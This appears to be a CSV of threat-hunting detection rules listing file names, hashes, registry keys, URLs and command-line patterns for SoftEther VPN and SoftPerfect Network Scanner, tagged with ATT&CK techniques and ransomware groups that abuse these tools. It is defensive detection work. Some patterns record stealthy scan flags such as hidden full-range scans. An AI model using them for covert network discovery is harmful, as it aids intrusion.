"*f402294bb18473a6dc22baec0c86e635cd2bc0423cb10026b5cbf9d6efcc698d*",".{0,1000}f402294bb18473a6dc22baec0c86e635cd2bc0423cb10026b5cbf9d6efcc698d.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*f7fcde269f7db9393f6e548fa4c0507f7a76b8a9a44caf34a69f7901463be977*",".{0,1000}f7fcde269f7db9393f6e548fa4c0507f7a76b8a9a44caf34a69f7901463be977.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*fc208016c808df328b5dfdecbb8b40883e1d10b3c064ea6a1126fcf3b8927531*",".{0,1000}fc208016c808df328b5dfdecbb8b40883e1d10b3c064ea6a1126fcf3b8927531.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*gitlab.com/SoftEther/VPN.git*",".{0,1000}gitlab\.com\/SoftEther\/VPN\.git.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" 
"*HKLM\SOFTWARE\SoftEther VPN *",".{0,1000}HKLM\\SOFTWARE\\SoftEther\sVPN\s.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*HKLM\Vpn_Check_Admin_Key_*",".{0,1000}HKLM\\Vpn_Check_Admin_Key_.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*http://get-my-ip.ddns.softether-network.net/ddns/getmyip.ashx*",".{0,1000}http\:\/\/get\-my\-ip\.ddns\.softether\-network\.net\/ddns\/getmyip\.ashx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*http://get-my-ip.ddns.uxcom.jp/ddns/getmyip.ashx*",".{0,1000}http\:\/\/get\-my\-ip\.ddns\.uxcom\.jp\/ddns\/getmyip\.ashx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" 
"*http://get-my-ip-v6.ddns.softether-network.net/ddns/getmyip.ashx*",".{0,1000}http\:\/\/get\-my\-ip\-v6\.ddns\.softether\-network\.net\/ddns\/getmyip\.ashx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*http://get-my-ip-v6.ddns.uxcom.jp/ddns/getmyip.ashx*",".{0,1000}http\:\/\/get\-my\-ip\-v6\.ddns\.uxcom\.jp\/ddns\/getmyip\.ashx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*http://senet.aoi.flets-east.jp/ddns/getmyip.ashx*",".{0,1000}http\:\/\/senet\.aoi\.flets\-east\.jp\/ddns\/getmyip\.ashx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*http://senet.p-ns.flets-west.jp/ddns/getmyip.ashx*",".{0,1000}http\:\/\/senet\.p\-ns\.flets\-west\.jp\/ddns\/getmyip\.ashx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" 
"*http://senet-flets.v6.softether.co.jp/ddns/getmyip.ashx*",".{0,1000}http\:\/\/senet\-flets\.v6\.softether\.co\.jp\/ddns\/getmyip\.ashx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*https://*.dev.servers.ddns.softether-network.net/ddns/ddns.aspx*",".{0,1000}https\:\/\/.{0,1000}\.dev\.servers\.ddns\.softether\-network\.net\/ddns\/ddns\.aspx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*https://*.dev.servers-v6.ddns.softether-network.net/ddns/ddns.aspx*",".{0,1000}https\:\/\/.{0,1000}\.dev\.servers\-v6\.ddns\.softether\-network\.net\/ddns\/ddns\.aspx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*https://senet-flets.v6.softether.co.jp/ddns/ddns.aspx*",".{0,1000}https\:\/\/senet\-flets\.v6\.softether\.co\.jp\/ddns\/ddns\.aspx.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*https://www.softether-download.com/*",".{0,1000}https\:\/\/www\.softether\-download\.com\/.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*service softether_server *",".{0,1000}service\ssoftether_server\s.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*SoftEtherVPN/SoftEtherVPN_Stable.git*",".{0,1000}SoftEtherVPN\/SoftEtherVPN_Stable\.git.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*sysrc softether_server_enable=yes*",".{0,1000}sysrc\ssoftether_server_enable\=yes.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" 
"*update-check.softether-network.net*",".{0,1000}update\-check\.softether\-network\.net.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "* /config:netscan.xml *",".{0,1000}\s\/config\:netscan\.xml\s.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "* netscan.exe *",".{0,1000}\snetscan\.exe\s.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "* netscan64.exe *",".{0,1000}\snetscan64\.exe\s.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network 
devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*.exe * /hide * /range:* /auto:*.*",".{0,1000}\.exe\s.{0,1000}\s\/hide\s.{0,1000}\s\/range\:.{0,1000}\s\/auto\:.{0,1000}\..{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*.exe /hide /range:all*",".{0,1000}\.exe\s\/hide\s\/range\:all.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*.exe /wakeall*",".{0,1000}\.exe\s\/wakeall.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about 
network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*/netscan.exe*",".{0,1000}\/netscan\.exe.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*/netscan_linux.tar.gz*",".{0,1000}\/netscan_linux\.tar\.gz.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*/netscan_macos.dmg*",".{0,1000}\/netscan_macos\.dmg.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 
- T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*/netscan_setup.exe*",".{0,1000}\/netscan_setup\.exe.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*/netscan64.exe*",".{0,1000}\/netscan64\.exe.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\SoftPerfect Network Scanner*",".{0,1000}\\AppData\\Roaming\\SoftPerfect\sNetwork\sScanner.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 
","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\netscan.dbm-journal*",".{0,1000}\\netscan\.dbm\-journal.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\netscan.exe*",".{0,1000}\\netscan\.exe.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\netscan_linux.tar.gz*",".{0,1000}\\netscan_linux\.tar\.gz.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - 
BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\netscan_portable.zip*",".{0,1000}\\netscan_portable\.zip.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\netscan_portable\*",".{0,1000}\\netscan_portable\\.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\netscan_setup.exe*",".{0,1000}\\netscan_setup\.exe.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - 
Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\netscan_setup.tmp*",".{0,1000}\\netscan_setup\.tmp.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\netscan64.exe*",".{0,1000}\\netscan64\.exe.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\SoftPerfect Network Scanner\*",".{0,1000}\\SoftPerfect\sNetwork\sScanner\\.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus 
- Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*delete.me<*",".{0,1000}\delete\.me\<.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com.cach3.com/board/read.php%3F12,10134,12202.html","1","0","N/A","risk of false positive","8","10","N/A","N/A","N/A","N/A" "*>SoftPerfect Network Scanner<*",".{0,1000}\>SoftPerfect\sNetwork\sScanner\<.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","#productname","N/A","8","10","N/A","N/A","N/A","N/A" "*87e8486846df3005c1b481b1c5205f661b715addfda262f56d2a41892126b399*",".{0,1000}87e8486846df3005c1b481b1c5205f661b715addfda262f56d2a41892126b399.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - 
BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A" "*https://www.softperfect.com/download/files/netscan*",".{0,1000}https\:\/\/www\.softperfect\.com\/download\/files\/netscan.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*https://www.softperfect.com/products/networkscanner/?from=nver*",".{0,1000}https\:\/\/www\.softperfect\.com\/products\/networkscanner\/\?from\=nver.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*netscan.exe /*",".{0,1000}netscan\.exe\s\/.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 
- T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*netscan_portable.zip*",".{0,1000}netscan_portable\.zip.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*SoftPerfect_*Patch_Keygen_v2*.exe*",".{0,1000}SoftPerfect_.{0,1000}Patch_Keygen_v2.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" 